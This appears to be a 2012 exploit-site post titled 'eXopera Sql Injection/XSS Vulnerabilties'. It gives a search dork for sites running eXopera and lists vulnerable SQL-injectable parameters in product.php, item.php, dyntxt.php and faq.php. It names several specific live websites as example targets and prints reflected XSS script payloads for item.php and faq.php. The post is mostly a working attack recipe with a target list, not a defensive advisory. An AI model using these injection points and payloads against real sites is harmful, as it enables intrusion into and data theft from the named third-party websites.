facebook facebook twitter rss

eXopera Sql Injection/XSS Vulnerabilties

Author: AtT4CKxT3rR0r1ST , Published: 20-06-2012
#######################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.exopera.be/
.:. Dork : "Powered by eXopera"
#######################################################################

===[ Exploit ]===


Multiple Sql Injection
=======================
http://SITE/product.php?prodid=sql
http://SITE/dyntxt.php?catno=20&itemno=sql
http://SITE/item.php?itemno=sql
http://SITE/faq.php?catid=sql

Example:

http://www.erfgoedcelsinttruiden.be/product.php?prodid=137[sql]
http://www.erfgoedcelkortrijk.be/product.php?prodid=316[sql]
http://erfgoedcelbrussel.be/product.php?prodid=368[sql]
http://www.erfgoedcelkempenskarakter.be/product.php?prodid=207[sql]
http://www.vandeputtetextiles.eu/dyntxt.php?catno=20&itemno=25[sql]
http://www.erfgoedcelsinttruiden.be/item.php?itemno=1[sql]
http://www.erfgoedcelsinttruiden.be/faq.php?catid=1

More In Google....



Multiple Reflected XSS
=======================

http://SITE/item.php?lang='"--></style></script><script>alert(1337)</script>
http://SITE/faq.php?catid=16&lang='"--></style></script><script>alert(1337)</script>
http://SITE/item.php?itemno='"--></style></script><script>alert(1337)</script>

#######################################################################

Like us on Facebook :